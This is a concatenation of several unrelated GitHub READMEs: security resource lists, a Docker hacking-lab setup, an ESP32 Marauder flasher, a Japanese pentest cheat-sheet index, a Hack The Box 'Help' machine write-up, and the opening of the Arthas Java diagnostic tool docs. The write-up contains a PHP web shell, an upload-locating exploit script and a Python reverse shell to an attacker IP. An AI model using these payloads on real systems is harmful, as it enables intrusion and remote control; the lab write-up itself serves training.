maintained by the community. (2015) - [CTF write-ups 2014](https://github.com/ctfs/write-ups-2014)<br> Wiki-like CTF write-ups repository, maintained by the community. (2014) - [CTF write-ups 2013](https://github.com/ctfs/write-ups-2013)<br> Wiki-like CTF write-ups repository, maintained by the community. (2013) ### CTF Repos - [captf](http://captf.com)<br> This site is primarily the work of psifertex since he needed a dump site for a variety of CTF material and since many other public sites documenting the art and sport of Hacking Capture the Flag events have come and gone over the years. - [shell-storm](http://shell-storm.org/repo/CTF)<br> The Jonathan Salwan's little corner. ### CTF Courses - [Hopper's Roppers CTF Course](https://hoppersroppers.github.io/courseCTF.html)<br> Free course designed to teach the fundamentals of Forensics, Cryptography, and Web-Exploitation required to be successful in Capture the Flag competitions. At the end of the course, students compete in the picoCTF event with guidance from instructors. SecurityTube Playlists ====================== Security Tube hosts a large range of video tutorials on IT security including penetration testing , exploit development and reverse engineering. * [SecurityTube Metasploit Framework Expert (SMFE)](http://www.securitytube.net/groups?operation=view&groupId=10)<br> This video series covers basics of Metasploit Framework. We will look at why to use metasploit then go on to how to exploit vulnerbilities with help of metasploit and post exploitation techniques with meterpreter. * [Wireless LAN Security and Penetration Testing Megaprimer](http://www.securitytube.net/groups?operation=view&groupId=9)<br> This video series will take you through a journey in wireless LAN (in)security and penetration testing. We will start from the very basics of how WLANs work, graduate to packet sniffing and injection attacks, move on to audit infrastructure vulnerabilities, learn to break into WLAN clients and finally look at advanced hybrid attacks involving wireless and applications. * [Exploit Research Megaprimer](http://www.securitytube.net/groups?operation=view&groupId=7)<br> In this video series, we will learn how to program exploits for various vulnerabilities published online. We will also look at how to use various tools and techniques to find Zero Day vulnerabilities in both open and closed source software. * [Buffer Overflow Exploitation Megaprimer for Linux](http://www.securitytube.net/groups?operation=view&groupId=4)<br> In this video series, we will understand the basic of buffer overflows and understand how to exploit them on linux based systems. In later videos, we will also look at how to apply the same principles to Windows and other selected operating systems. Open Security Books =================== #### Crypto 101 - lvh Comes with everything you need to understand complete systems such as SSL/TLS: block ciphers, stream ciphers, hash functions, message authentication codes, public key encryption, key agreement protocols, and signature algorithms. Learn how to exploit common cryptographic flaws, armed with nothing but a little time and your favorite programming language. Forge administrator cookies, recover passwords, and even backdoor your own random number generator. - [Crypto101](https://www.crypto101.io/) - [LaTeX Source](https://github.com/crypto101/book) #### A Graduate Course in Applied Cryptography - Dan Boneh & Victor Shoup This book is about constructing practical cruptosystems for which we can argue security under plausible assumptions. The book covers many constructions for different tasks in cryptography. For each task we define the required goal. To analyze the constructions, we develop a unified framework for doing cryptographic proofs. A reader who masters this framework will capable of applying it to new constructions that may not be covered in this book. We describe common mistakes to avoid as well as attacks on real-world systems that illustratre the importance of rigor in cryptography. We end every chapter with a fund application that applies the ideas in the chapter in some unexpected way. - [A Graduate Course in Applied Cryptography](https://crypto.stanford.edu/~dabo/cryptobook/) #### Security Engineering, A Guide to Building Dependable Distributed Systems - Ross Anderson The world has changed radically since the first edition of this book was published in 2001. Spammers, virus writers, phishermen, money launderers, and spies now trade busily with each other in a lively online criminal economy and as they specialize, they get better. In this indispensable, fully updated guide, Ross Anderson reveals how to build systems that stay dependable whether faced with error or malice. Here?s straight talk on critical topics such as technical engineering basics, types of attack, specialized protection mechanisms, security psychology, policy, and more. - [Security Engineering, Second Edition](https://www.cl.cam.ac.uk/~rja14/book.html) #### Reverse Engineering for Beginners - Dennis Yurichev This book offers a primer on reverse-engineering, delving into disassembly code-level reverse engineering and explaining how to decipher assembly language for those beginners who would like to learn to understand x86 (which accounts for almost all executable software in the world) and ARM code created by C/C++ compilers. - [Reverse Engineering for Beginners](http://beginners.re/) - [LaTeX Source](https://github.com/dennis714/RE-for-beginners) #### CTF Field Guide - Trail of Bits The focus areas that CTF competitions tend to measure are vulnerability discovery, exploit creation, toolkit creation, and operational tradecraft.. Whether you want to succeed at CTF, or as a computer security professional, you'll need to become an expert in at least one of these disciplines. Ideally in all of them. - [CTF Field Guide](https://trailofbits.github.io/ctf/) - [Markdown Source](https://github.com/trailofbits/ctf) Challenges ========== - [Reverse Engineering Challenges](https://challenges.re/) - [Matasano Crypto Challenges](http://cryptopals.com/) Documentation ============= #### OWASP - Open Web Application Security Project The Open Web Application Security Project (OWASP) is a 501(c)(3) worldwide not-for-profit charitable organization focused on improving the security of software. Our mission is to make software security visible, so that individuals and organizations worldwide can make informed decisions about true software security risks. - [Open Web Application Security Project](https://www.owasp.org/index.php/Main_Page) #### Applied Crypto Hardening - bettercrypto.org This guide arose out of the need for system administrators to have an updated, solid, well re-searched and thought-through guide for configuring SSL, PGP,SSH and other cryptographic tools in the post-Snowdenage. Triggered by the NSA leaks in the summer of 2013, many system administrators and IT security officers saw the need to strengthen their encryption settings.This guide is specifically written for these system administrators. - [Applied Crypto Hardening](https://bettercrypto.org/static/applied-crypto-hardening.pdf) - [LaTeX Source](https://github.com/BetterCrypto/Applied-Crypto-Hardening) #### PTES - Penetration Testing Execution Standard The penetration testing execution standard cover everything related to a penetration test - from the initial communication and reasoning behind a pentest, through the intelligence gathering and threat modeling phases where testers are working behind the scenes in order to get a better understanding of the tested organization, through vulnerability research, exploitation and post exploitation, where the technical security expertise of the testers come to play and combine with the business understanding of the engagement, and finally to the reporting, which captures the entire process, in a manner that makes sense to the customer and provides the most value to it. - [Penetration Testing Execution Standard](http://www.pentest-standard.org/index.php/Main_Page) ## Types of Infosec - **Application security** - Application security is a broad topic that covers software vulnerabilities in web and mobile applications and application programming interfaces (APIs). These vulnerabilities may be found in authentication or authorization of users, integrity of code and configurations, and mature policies and procedures. Application vulnerabilities can create entry points for significant InfoSec breaches. Application security is an important part of perimeter defense for InfoSec. - **Cloud Security** - Cloud security focuses on building and hosting secure applications in cloud environments and securely consuming third-party cloud applications. “Cloud” simply means that the application is running in a shared environment. Businesses must make sure that there is adequate isolation between different processes in shared environments. - **Cryptography** - Encrypting data in transit and data at rest helps ensure data confidentiality and integrity. Digital signatures are commonly used in cryptography to validate the authenticity of data. Cryptography and encryption has become increasingly important. A good example of cryptography use is the Advanced Encryption Standard (AES). The AES is a symmetric key algorithm used to protect classified government information. - **Infrastructure security** - Infrastructure security deals with the protection of internal and extranet networks, labs, data centers, servers, desktops, and mobile devices. - **Incident response** - Incident response is the function that monitors for and investigates potentially malicious behavior. In preparation for breaches, IT staff should have an incident response plan for containing the threat and restoring the network. In addition, the plan should create a system to preserve evidence for forensic analysis and potential prosecution. This data can help prevent further breaches and help staff discover the attacker. - **Vulnerability Management** - Vulnerability management is the process of scanning an environment for weak points (such as unpatched software) and prioritizing remediation based on risk. In many networks, businesses are constantly adding applications, users, infrastructure, and so on. For this reason, it is important to constantly scan the network for potential vulnerabilities. Finding a vulnerability in advance can save your businesses the catastrophic costs of a breach. **[`^ back to top ^`](#)** ## License MIT License & [cc](https://creativecommons.org/licenses/by/4.0/) license <a rel="license" href="http://creativecommons.org/licenses/by/4.0/"><img alt="Creative Commons License" style="border-width:0" src="https://i.creativecommons.org/l/by/4.0/88x31.png" /></a><br />This work is licensed under a <a rel="license" href="http://creativecommons.org/licenses/by/4.0/">Creative Commons Attribution 4.0 International License</a>. To the extent possible under law, [Paul Veillard](https://github.com/paulveillard/) has waived all copyright and related or neighboring rights to this work. **[`^ back to top ^`](#)**
Docker Hacklab === > My personal hacklab, create your own. French article: https://blog.ston3o.me/creer-hacklab-virtuel-docker/ Quick Start --- ``` $ docker run --name hacklab --net=host --privileged -it ston3o/docker-hacklab zsh _ _ _ ___ _ ___ _ ___ | || | /_\ / __| |/ / | /_\ | _ ) | __ |/ _ \ (__| ' <| |__ / _ \| _ \ |_||_/_/ \_\___|_|\_\____/_/ \_\___/ https://github.com/ston3o/docker-hacklab ``` Alias --- ```bash # ~/.bashrc alias hacklab='docker run -d --name hacklab --net=host --privileged=true -v /tmp/:/mnt -it ston3o/docker-hacklab bash > /dev/null 2>&1; docker start hacklab > /dev/null; docker exec -it -e COLUMNS=$COLUMNS -e LINES=$LINES -e TERM=$TERM hacklab zsh' ``` Other useful docker commands --- ```bash # Vulnerability scanners $ docker run -d --name nessus -p 8834:8834 infoslack/nessus $ docker run -d --name openvas -p 443:443 -p 9390:9390 -p 9391:9391 mikesplain/openvas $ docker run --rm -it menzo/sn1per-docker sniper <example.com> # Run vulnerable web application $ docker run -d --name dvwa -it -p 80:80 vulnerables/web-dvwa # Search Mobile Vulns $ docker run -d --name mobsf -it -p 8000:8000 opensecurity/mobsf:latest ``` Exploit database --- - http://cve.mitre.org/ - http://0day.today/ - https://nvd.nist.gov/ - http://www.securityfocus.com/bid/ - https://www.exploit-db.com/ - http://www.cvedetails.com/ Search Engines --- - https://www.shodan.io/ - https://censys.io/ - https://www.zoomeye.org/ Doxing / OSINT --- - http://www.peekyou.com/ - https://pipl.com/ - https://iplogger.org/ Other resources --- - http://sectools.org/ - http://pwnwiki.io/ - https://www.cybrary.it/ - http://null-byte.wonderhowto.com/ - https://n0where.net/ - https://www.kitploit.com/ - https://pentestlab.blog/ - http://haxf4rall.com/ - http://www.hackingarticles.in/ - https://hackademics.fr - https://pentest-tools.com/ - https://instant-hack.io/ - http://zenk-security.com/ - https://www.hacksplaining.com/ - https://www.punycoder.com/ - https://securityonline.info - http://hardsploit.io - https://weleakinfo.com/ - https://gexos.github.io/Hacking-Tools-Repository/ - https://penetration-testing.zeef.com/jeroen.rijken - http://www.funinformatique.com/google-dorks-hackez-requete-google/ - https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/ - http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet - https://ctf365.com/ - https://www.codebashing.com/ Github repositories --- - https://github.com/cSploit/android - https://github.com/enaqx/awesome-pentest - https://github.com/Hack-with-Github/Awesome-Hacking - https://github.com/sindresorhus/awesome#security - https://github.com/carpedm20/awesome-hacking - https://github.com/brannondorsey/wifi-cracking - https://github.com/gchq/CyberChef - https://github.com/danielmiessler/SecLists - https://github.com/We5ter/Scanners-Box - https://github.com/vitalysim/Awesome-Hacking-Resources - https://github.com/infosecn1nja/Red-Teaming-Toolkit Youtube Channels --- - https://www.youtube.com/user/Hak5Darren/videos - https://www.youtube.com/user/DEFCONConference/videos - https://www.youtube.com/user/BlackHatOfficialYT/videos - https://www.youtube.com/user/JackkTutorials/videos - https://www.youtube.com/user/gaytony10/playlists - https://www.youtube.com/user/bhargavtandel/videos - https://www.youtube.com/channel/UC286ntgASMskhPIJQebJVvA/videos - https://www.youtube.com/channel/UCO51Z4c1R8EPHZioGwgBmDw/videos - https://www.youtube.com/channel/UC0ZTPkdxlAKf-V33tqXwi3Q/videos - https://www.youtube.com/playlist?list=PLkRo97mCIn9lgvE7AskNsmwJVOlJX2zaI Support me --- I'd love to work on this project, but my time on this earth is limited, support my work to give me more time! Please support me with a one-time or a monthly donation and help me continue my activities. [![Github sponsor](https://img.shields.io/badge/github-Support%20my%20work-lightgrey?style=social&logo=github)](https://github.com/sponsors/johackim/) [![ko-fi](https://img.shields.io/badge/ko--fi-Support%20my%20work-lightgrey?style=social&logo=ko-fi)](https://ko-fi.com/johackim) [![Buy me a coffee](https://img.shields.io/badge/Buy%20me%20a%20coffee-Support%20my%20work-lightgrey?style=social&logo=buy%20me%20a%20coffee&logoColor=%23FFDD00)](https://www.buymeacoffee.com/johackim) [![liberapay](https://img.shields.io/badge/liberapay-Support%20my%20work-lightgrey?style=social&logo=liberapay&logoColor=%23F6C915)](https://liberapay.com/johackim/donate) [![Github](https://img.shields.io/github/followers/johackim?label=Follow%20me&style=social)](https://github.com/johackim) [![Mastodon](https://img.shields.io/mastodon/follow/1631?domain=https%3A%2F%2Fmastodon.ethibox.fr&style=social)](https://mastodon.ethibox.fr/@johackim) [![Twitter](https://img.shields.io/twitter/follow/_johackim?style=social)](https://twitter.com/_johackim) License --- GNU GPL v3.0 **Free Software, Hell Yeah!**
# Quick and easy flasher/updater for [Marauder](https://github.com/justcallmekoko/ESP32Marauder) ESP32-WROOM! ## This flasher/updater will work for any ESP32-WROOM chip or the v4 OEM Marauder. Looking for a Linux/OS X version? [Check out SkeletonMan's Python edition!](https://github.com/SkeletonMan03/FZEasyMarauderFlash) ![Flasher_1](https://user-images.githubusercontent.com/57457139/210445500-c0ef079e-6d5e-4157-b61f-2c4f8bc83820.png) ## Now it's as easy as 1, 2, 3 to install or update Marauder on Windows. 1. Download and extract [the ZIP file](https://github.com/UberGuidoZ/Flipper/raw/main/Wifi_DevBoard/FZ_Marauder_Flasher/ESP32-WROOM/Marauder_WROOM_v1.10.zip) above to the same directory.<br> 2. Plug in your ESP32-WROOM or v4 OEM Marauder directly into your PC via USB.<br> 3. Double-click `Flash-WROOM.bat` from the extracted files then choose `Flash` or `Update`. **NOTE: You may have to hold the boot button while plugging it in or even for the entire duration of the flash!** * If you choose `Flash Marauder` the script will locate your board and flash Marauder automatically!<br> * If you choose `Update Marauder` you'll be taken to the Marauder download location to grab a new version.<br> (Simply download the OLD_HARDWARE BIN file, stick it in the WROOM subfolder by the batch file, and delete the old BIN.)<br> * If you choose `Download USB UART` the script will open the Silicon Labs driver download. Current Marauder version included in the ZIP: v0.10.2.20230315 (current release as of Mar 15, 2023) **Once the install has completed, [head over here](https://github.com/justcallmekoko/ESP32Marauder/wiki) to learn more about what Marauder can do!** The [batch file](https://github.com/UberGuidoZ/Flipper/blob/main/Wifi_DevBoard/FZ_Marauder_Flasher/ESP32-WROOM/Flash-WROOM.bat) is also included above for review and to track changes. Acknowledgements:<br> * [justcallmekoko](https://github.com/justcallmekoko/ESP32Marauder) for the AWESOME work in developing Marauder and porting it to the Flipper. * [Frog](https://github.com/FroggMaster) For initial scripting under the [Wifi Pentest Tool](https://github.com/FroggMaster/ESP32-Wi-Fi-Penetration-Tool) and inspiring the idea.<br> * [SkeletonMan](https://github.com/SkeletonMan03/FZEasyMarauderFlash) For initial WROOM scripting and inspiration.<br> * [UberGuidoZ](https://github.com/UberGuidoZ) Creation of this one, plus tweaking/automating Frog's original, continued scripting, development, and testing. ----- ## Donation Information Nothing is ever expected for the hoarding of digital files, creations I have made, or the people I may have helped. ## Ordering from Lab401? [USE THIS LINK FOR 5% OFF!](https://lab401.com/r?id=vsmgoc) (Or code `UberGuidoZ` at checkout.) I've had so many asking for me to add this.<br> ![Flipper_Blush](https://user-images.githubusercontent.com/57457139/183561666-4424a3cc-679b-4016-a368-24f7e7ad0a88.jpg) ![Flipper_Love](https://user-images.githubusercontent.com/57457139/183561692-381d37bd-264f-4c88-8877-e58d60d9be6e.jpg) **BTC**: `3AWgaL3FxquakP15ZVDxr8q8xVTc5Q75dS`<br> **BCH**: `17nWCvf2YPMZ3F3H1seX8T149Z9E3BMKXk`<br> **ETH**: `0x0f0003fCB0bD9355Ad7B124c30b9F3D860D5E191`<br> **LTC**: `M8Ujk52U27bkm1ksiWUyteL8b3rRQVMke2`<br> **PayPal**: `[email protected]` So, here it is. All donations of *any* size are humbly appreciated.<br> ![Flipper_Clap](https://user-images.githubusercontent.com/57457139/183561789-2e853ede-8ef7-41e8-a67c-716225177e5d.jpg) ![Flipper_OMG](https://user-images.githubusercontent.com/57457139/183561787-e21bdc1e-b316-4e67-b327-5129503d0313.jpg) Donations will be used for hardware (and maybe caffeine) to further testing!<br> ![UberGuidoZ](https://cdn.discordapp.com/emojis/1000632669622767686.gif)
# MY CHEAT SHEET(Only Japanese) ペネトレーションテストの練習(Hack the Box, VulnHub)等を行う際に参考にしてください。 アドバイスやミス等ありましたら[Twitter(@さんぽし)](https://twitter.com/sanpo_shiho)までお願いします (PR or issueでも勿論OKです!) This is a cheat sheet in penetration testing. Please use it when hacking Hack the Box, VulnHub, etc. **悪用厳禁 DO NOT ABUSE** # 目次(Contents) ## Linux - [commands(on Kali)](https://github.com/sanposhiho/MY_CHEAT_SHEET/blob/master/Linux/kali_commands.md) - [commands(on Target machines)](https://github.com/sanposhiho/MY_CHEAT_SHEET/blob/master/Linux/linux_commands.md) - [調査すべきFiles(WIP)](https://github.com/sanposhiho/MY_CHEAT_SHEET/blob/master/Linux/FilesToExamine.md) - [others](https://github.com/sanposhiho/MY_CHEAT_SHEET/blob/master/Linux/other_technic.md) ### Privilege Escalation - [linpeas](https://github.com/sanposhiho/MY_CHEAT_SHEET/blob/master/Linux/privilege%20escalation/linpeas.md) - [linuxprivchecker](https://github.com/sanposhiho/MY_CHEAT_SHEET/blob/master/Linux/privilege%20escalation/linuxprivchecker.md) - [pspy](https://github.com/sanposhiho/MY_CHEAT_SHEET/blob/master/Linux/privilege%20escalation/pspy.md) ## Windows - [Invoke-PowerShellTcp(nishang)](https://github.com/sanposhiho/my_cheat_sheet/tree/master/Windows/Invoke-PowerShellTcp.md) - [Invoke-ConPtyShell](https://github.com/sanposhiho/MY_CHEAT_SHEET/blob/master/Windows/Invoke-ConPtyShell.md) - [ASREPRoast](https://github.com/sanposhiho/MY_CHEAT_SHEET/blob/master/Windows/ASREPRoast.md) - [BloodHound](https://github.com/sanposhiho/MY_CHEAT_SHEET/blob/master/Windows/BloodHound.md) - [PsExec](https://github.com/sanposhiho/MY_CHEAT_SHEET/blob/master/Windows/PsExec.md) - [Chisel(tunneling)](https://github.com/sanposhiho/MY_CHEAT_SHEET/blob/master/Windows/Chisel(tunneling).md) - [FileUpload](https://github.com/sanposhiho/MY_CHEAT_SHEET/blob/master/Windows/FileUpload.md) - [commands](https://github.com/sanposhiho/MY_CHEAT_SHEET/blob/master/Windows/windows_commands.md) - [others](https://github.com/sanposhiho/MY_CHEAT_SHEET/blob/master/Windows/other_technic.md) ### Privilege Escalation - [Kerberoasting攻撃](https://github.com/sanposhiho/MY_CHEAT_SHEET/blob/master/Windows/privilege%20escalation/Kerberoasting.md) - [PowerSploit](https://github.com/sanposhiho/MY_CHEAT_SHEET/blob/master/Windows/privilege%20escalation/PowerSploit.md) - [winPEAS](https://github.com/sanposhiho/MY_CHEAT_SHEET/blob/master/Windows/privilege%20escalation/winPEAS.md) - [windows-exploit-suggester](https://github.com/sanposhiho/MY_CHEAT_SHEET/blob/master/Windows/privilege%20escalation/windows-exploit-suggester.md) ### Kernel Exploits - [MS09-012](https://github.com/sanposhiho/MY_CHEAT_SHEET/blob/master/Windows/privilege%20escalation/Kernel%20Exploits/MS09-012.md) - [MS15-051](https://github.com/sanposhiho/MY_CHEAT_SHEET/blob/master/Windows/privilege%20escalation/Kernel%20Exploits/MS15-051.md) ## Enumeration - [AutoRecon](https://github.com/sanposhiho/MY_CHEAT_SHEET/blob/master/enumeration/AutoRecon.md) - [nmap](https://github.com/sanposhiho/MY_CHEAT_SHEET/blob/master/enumeration/nmap.md) - [Nikto](https://github.com/sanposhiho/MY_CHEAT_SHEET/blob/master/enumeration/Nikto.md) - [gobuster](https://github.com/sanposhiho/MY_CHEAT_SHEET/blob/master/enumeration/gobuster.md) - [hydra](https://github.com/sanposhiho/MY_CHEAT_SHEET/blob/master/enumeration/hydra.md) - [smb/nfs](https://github.com/sanposhiho/MY_CHEAT_SHEET/blob/master/enumeration/smb.md) - [sqlmap](https://github.com/sanposhiho/MY_CHEAT_SHEET/blob/master/enumeration/sqlmap.md) - [CeWL](https://github.com/sanposhiho/MY_CHEAT_SHEET/blob/master/enumeration/CeWL.md) - [wpscan](https://github.com/sanposhiho/MY_CHEAT_SHEET/blob/master/enumeration/wpscan.md) - [LFI2RCE](https://github.com/sanposhiho/MY_CHEAT_SHEET/blob/master/enumeration/LFI2RCE.md) - [OneTwoPunch](https://github.com/sanposhiho/MY_CHEAT_SHEET/blob/master/enumeration/onetwopunch.md) ## Others - [Burp Suite](https://github.com/sanposhiho/MY_CHEAT_SHEET/blob/master/others/BurpSuite.md) - [john_the_ripper](https://github.com/sanposhiho/MY_CHEAT_SHEET/blob/master/others/john_the_ripper.md) - [reverse_shellまとめ](https://github.com/sanposhiho/MY_CHEAT_SHEET/blob/master/others/reverse_shell.md) - [msfvenom](https://github.com/sanposhiho/MY_CHEAT_SHEET/blob/master/others/msfvenom.md) - [others](https://github.com/sanposhiho/MY_CHEAT_SHEET/blob/master/others/other_technic.md)
# Help ![alt text](Images/help.png) __Machine URL__: https://www.hackthebox.eu/home/machines/profile/170 __Machine IP__: 10.10.10.121 __DATE__ : 3/05/2019 __START TIME__: 9:50 AM *** `Nmap scan` ----------- ![alt text](Images/nmap.png) There is nothing new going on in here. Just some basic ports along with a port 3000 running another website written in node. Let's enum both of those website and see what we find `dirsearch` ------------- ![alt text](Images/dirsearch-1.png) So there's a javascript folder but when we try to open it up we get error `403`that means we are forbidden from accessing the content. But we can open the `/support/` URL. Let's see what we find on port `3000` i.e the nodejs website ![alt text](Images/dirsearch-2.png) The port 3000 looks like having an API. And there are two URLs that have been found. Getting Credentials -------------------- If we visit the http://10.10.10.121:3000/ we get the following data: ```json ➜ http http://10.10.10.121:3000/ | jq . { "message": "Hi Shiv, To get access please find the credentials with given query" } ``` We know one thing from this. That there's a user(maybe admin?) named `Shiv` Now visiting the `graphql/` We get: ```bash ➜ http http://10.10.10.121:3000/graphql HTTP/1.1 400 Bad Request Connection: keep-alive Date: Fri, 03 May 2019 04:57:46 GMT Transfer-Encoding: chunked X-Powered-By: Express GET query missing. ``` So we can use this to find more information about the user and password. ![](Images/graphql.png) Cracking the hash `5d3c93182bb20f07b994a7f617e99cff` we get `godhelpmeplz` CREDENTIALS: `[email protected]:godhelpmeplz` **NOTE**: How did I found it in a first try? Read: https://github.com/Anonyme1396/security-tips/blob/master/web.md#exploiting-2 File Upload Vulnerability ------------------------- A simple google search with `Helpdeskz exploit` bears out a result [HelpDeskZ 1.0.2 - Arbitrary File Upload](https://www.exploit-db.com/exploits/40300) This mean we can upload the file and then simply use this to find the location of the uploaded file. I uploaded a `backdoor.php` ```php <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; } ?> ``` ![](Images/backdoor.php) When you'll submit the file it is possible that you'll get an error saying `File is not allowed.`. This does set me off first so I decided to go through the `Helpdeskz` [source code](https://github.com/evolutionscript/HelpDeskZ-1.0), since it is open source application. After looking around I found a file in `include/parser` called `new-ticket.php` ![](Images/ticket-source.png) After the file is uploaded it perform a check on the `$fileinfo` by passing that value to a `verifyAttachment` function. Let's take a look at this function ![](Images/verify-source.png) This function is perform multiple checks on the file but there's isn't any `file extension` check. This mean the error we are getting i.e `File not allowed` is meaningless and we can totally ignore it. Exploit ------- One of my friend suggested to use the exploit from `0day` ```python import requests import hashlib from time import time def md5(data): return hashlib.md5(data.encode("utf-8")).hexdigest() def get(base, filename, at): uploaded_file = "{}/uploads/tickets/{}.{}".format( base.rstrip("/"), md5(filename + str(at)), filename.split(".")[-1] ) r = requests.get(uploaded_file) if r.status_code == 200: return uploaded_file def main(): for i in range(1000): url = get("http://10.10.10.121/support/", "backdoor.php", int(time() - i)) if url is not None: print(url) return print("Oops ... not found") if __name__ == "__main__": main() ``` Since there's some timezone issue with `Helpdeskz` I decided to change the timezone. ![](Images/timezone.png) Then I ran the exploit and got the path to the file. ``` http://10.10.10.121/support/uploads/tickets/84c045a6c4cccf0880fc139c6ba7599a.php ``` PWN USER -------- ![whoami](Images/whoami) In this way we can get the user ![](Images/user.png) PWN root -------- Now first we need to get reverse shell to get into the machine. I tried to pass ```python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` but for some reason this didn't worked so I encoded everything and then decided to do it. ```bash http://10.10.10.121/support/uploads/tickets/84c045a6c4cccf0880fc139c6ba7599a.php?cmd="python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%2210.10.12.139%22%2C4444))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3Dsubprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27" ``` With this I got the reverse shell. Then I spawned a pty shell ```bash python -c 'import pty; pty.spawn("/bin/sh")' ``` After that I enumerated with the help of `LinEnum` and found a kernel vulnerable to [local privilege escalation vulnerability](https://www.exploit-db.com/exploits/44298) ![](Images/kernel.png) So I downloaded the exploit and compiled it and then run it. This will give you the root shell. Then you can simply cat the `/root/root.txt` ``` b7fe6082dcdf0c1b1eXXXXXXXXXXXXXXX ```
## Arthas ![arthas](site/src/site/sphinx/arthas.png) `Arthas` is a Java Diagnostic tool open sourced by Alibaba. Arthas help developers in trouble-shooting production issues for Java applications without modifying code or restarting servers. [中文说明](README_CN.md) (For Chinese Documentation) ### Background Often times, the production system network is inaccessible from local development environment. If issues are encountered in production systems, it is impossible to use IDE to debug the application remotely. More importantly, debugging in production environment is unacceptable, as it will suspend all the threads, which leads to blocking of business services. Developers could always try to reproduce the same issue on the test/staging environment. However, this is tricky as some issues cannot be be reproduced easily on a different environment, or even disappear once restarted. And if you're thinking of adding some logs to your code to help trouble-shoot the issue, you will have to go through the following lifecycle; test, staging, and then to production. Time is money! This approach is inefficient! Besides, the issue may not be reproducible once the JVM is restarted, as described above. Arthas was built to solve these issues. A developer can trouble-shoot your production issues on-the-fly. No JVM restart, no additional code changes. Arthas works as an observer, which will never suspend your existing threads. ### Key features * Check whether a class is loaded? Or where the class is loaded from? (Useful for trouble-shooting jar file conflicts) * Decompile a class to ensure the code is running as expected. * View classloader statistics, e.g. the number of classloaders, the number of classes loaded per classloader, the classloader hierarchy, possible classloader leaks, etc. * View the method invocation details, e.g. method parameter, return object, thrown exception, and etc. * Check the stack trace of specified method invocation. This is useful when a developers wants to know the caller of the said method. * Trace the method invocation to find slow sub-invocations. * Monitor method invocation statistics, e.g. qps, rt, success rate and etc. * Monitor system metrics, thread states and cpu usage, gc statistics, and etc. * Supports command line interactive mode, with auto-complete feature enabled. * Supports telnet and websocket, which enables both local and remote diagnostics with command line and browsers. ### Quick start #### Linux/Unix/Mac Install Arthas: ``` curl -L https://alibaba.github.io/arthas/install.sh | sh ``` Start Arthas: ``` ./as.sh ``` #### Windows 1. Click [![Arthas](https://img.shields.io/maven-central/v/com.taobao.arthas/arthas-packaging.svg "Arthas")](http://search.maven.org/classic/#search%7Cga%7C1%7Cg%3A%22com.taobao.arthas%22%20AND%20a%3A%22arthas-packaging%22) to download the latest binary releases of `bin.zip`. 2. Unzip the file. 3. Go to the bin directory 4. Run the following command `as.bat $PID` ### Documentation English version is on the way, if you would like to contribute, please leave a message [here](https://github.com/alibaba/arthas/issues/51) * [User manual](https://alibaba.github.io/arthas/en) * [Installation](https://alibaba.github.io/arthas/en/install-detail.html) * [Quick start](https://alibaba.github.io/arthas/en/quick-start.html) * [Advanced usage](https://alibaba.github.io/arthas/en/advanced-use.html) * [Questions and answers](https://github.com/alibaba/arthas/issues?utf8=%E2%9C%93&q=label%3Aquestion-answered+) * [How to contribute](https://github.com/alibaba/arthas/blob/master/CONTRIBUTING.md) ### Feature Showcase #### Dashboard * https://alibaba.github.io/arthas/dashboard ![dashboard](site/src/site/sphinx/_static/dashboard.png) #### Thread See what is eating your cpu (ranked by top cpu usage) and what is going on there in one glance: ``` $ thread -n 3 "as-command-execute-daemon" Id=29 cpuUsage=75% RUNNABLE at sun.management.ThreadImpl.dumpThreads0(Native Method) at sun.management.ThreadImpl.getThreadInfo(ThreadImpl.java:440) at com.taobao.arthas.core.command.monitor200.ThreadCommand$1.action(ThreadCommand.java:58) at com.taobao.arthas.core.command.handler.AbstractCommandHandler.execute(AbstractCommandHandler.java:238) at com.taobao.arthas.core.command.handler.DefaultCommandHandler.handleCommand(DefaultCommandHandler.java:67) at com.taobao.arthas.core.server.ArthasServer$4.run(ArthasServer.java:276) at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145) at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615) at java.lang.Thread.run(Thread.java:745) Number of locked synchronizers = 1 - java.util.concurrent.ThreadPoolExecutor$Worker@6cd0b6f8 "as-session-expire-daemon" Id=25 cpuUsage=24% TIMED_WAITING at java.lang.Thread.sleep(Native Method) at com.taobao.arthas.core.server.DefaultSessionManager$2.run(DefaultSessionManager.java:85) "Reference Handler" Id=2 cpuUsage=0% WAITING on java.lang.ref.Reference$Lock@69ba0f27 at java.lang.Object.wait(Native Method) - waiting on java.lang.ref.Reference$Lock@69ba0f27 at java.lang.Object.wait(Object.java:503) at java.lang.ref.Reference$ReferenceHandler.run(Reference.java:133) ``` #### jad Decompile your class with one shot: ```java $ jad javax.servlet.Servlet ClassLoader: +-java.net.URLClassLoader@6108b2d7 +-sun.misc.Launcher$AppClassLoader@18b4aac2 +-sun.misc.Launcher$ExtClassLoader@1ddf84b8 Location: /Users/xxx/work/test/lib/servlet-api.jar /* * Decompiled with CFR 0_122. */ package javax.servlet; import java.io.IOException; import javax.servlet.ServletConfig; import javax.servlet.ServletException; import javax.servlet.ServletRequest; import javax.servlet.ServletResponse; public interface Servlet { public void init(ServletConfig var1) throws ServletException; public ServletConfig getServletConfig(); public void service(ServletRequest var1, ServletResponse var2) throws ServletException, IOException; public String getServletInfo(); public void destroy(); } ``` #### sc Search any loaded class with detailed infomation. ``` $ sc -d org.springframework.web.context.support.XmlWebApplicationContext class-info org.springframework.web.context.support.XmlWebApplicationContext code-source /Users/xxx/work/test/WEB-INF/lib/spring-web-3.2.11.RELEASE.jar name org.springframework.web.context.support.XmlWebApplicationContext isInterface false isAnnotation false isEnum false isAnonymousClass false isArray false isLocalClass false isMemberClass false isPrimitive false isSynthetic false simple-name 